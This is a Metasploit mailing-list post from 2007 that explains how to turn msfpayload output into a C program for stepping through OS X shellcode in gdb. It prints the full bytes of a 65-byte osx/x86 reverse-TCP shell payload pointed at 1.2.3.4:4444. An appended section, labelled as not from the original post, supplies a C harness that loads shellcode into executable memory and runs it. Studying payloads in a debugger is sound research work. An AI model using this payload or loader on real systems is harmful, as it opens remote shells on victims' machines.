Metasploit mailing list archives

msfpayload mach-o


From: hdm at metasploit.com (H D Moore)
Date: Fri, 17 Aug 2007 16:56:14 -0500

On Friday 17 August 2007 16:47, Daniel Guido wrote:
> Are there any plans to write a Rex::Text.to_osxmacho function? :-)

Not yet, any volunteers? ;-)

> If I wanted to disassemble the OSX x86 payloads to see what they're
> doing, how could I write a small program to compile them and load them
> into gdb? (assuming that's the best way to go about it). I'm a little
> stuck.

Try something like:

$ msfpayload osx/x86/payload_name OPT=VAL C

Take this code, put it into a C file that casts the shellcode array to a 
function pointer, then calls it (lots of examples in the shellcode 
section of milw0rm.com). Then compile and breakpoint like any other app.

Example:

$ msfpayload osx/x86/shell_reverse_tcp LHOST=1.2.3.4 C

/*
 * osx/x86/shell_reverse_tcp - 65 bytes
 * http://www.metasploit.com
 * AppendExit=false, PrependSetresuid=false,
 * PrependSetuid=false, LPORT=4444, PrependSetreuid=false,
 * LHOST=1.2.3.4
 */
unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";

Example C:

http://milw0rm.com/shellcode/536 PPC
http://milw0rm.com/shellcode/504 X86

-HD
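A harness for the step HD describes, as an added example that is not from the original post: paste the byte array that `msfpayload ... C` prints, cast it to a function pointer and call it, with an optional SIGTRAP so gdb stops right before control enters the payload. On current toolchains an `unsigned char buf[]` global lands in non-executable memory, so the bytes are first copied into an mmap'd RWX page; the 6-byte stub below is a constructed, harmless x86-64 `mov eax, 42; ret` standing in for a real payload, and a POSIX mmap is assumed.

```c
/* Added example (not from the original post): load raw shellcode bytes
 * into executable memory and call them, so the payload can be stepped
 * through in gdb like any other function. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <sys/mman.h>

/* Copy `code` into an anonymous RWX mapping and call it as int f(void).
 * Returns -1 if the mapping fails.  With `break_first` non-zero, raise
 * SIGTRAP first: gdb stops here and `stepi` walks into the payload. */
int run_shellcode(const unsigned char *code, size_t len, int break_first)
{
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    memcpy(page, code, len);

    /* The cast HD mentions: treat the buffer as a function pointer. */
    int (*entry)(void) = (int (*)(void))page;
    if (break_first)
        raise(SIGTRAP);
    int rc = entry();
    munmap(page, len);
    return rc;
}

/* Constructed, harmless x86-64 stub used in place of a real payload:
 * mov eax, 42 ; ret */
static const unsigned char demo_stub[] = "\xb8\x2a\x00\x00\x00\xc3";

/* Runs the stub on x86-64 hosts; returns -2 elsewhere, where the bytes
 * would not be valid machine code. */
int run_demo(void)
{
#if defined(__x86_64__)
    return run_shellcode(demo_stub, sizeof(demo_stub) - 1, 0);
#else
    return -2;
#endif
}

int main(void)
{
    /* Build and debug: cc -g harness.c -o harness && gdb ./harness */
    printf("payload returned %d\n", run_demo());
    return 0;
}
```

To debug a real payload, replace `demo_stub` with the `buf[]` array from the msfpayload output and pass `break_first = 1`.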
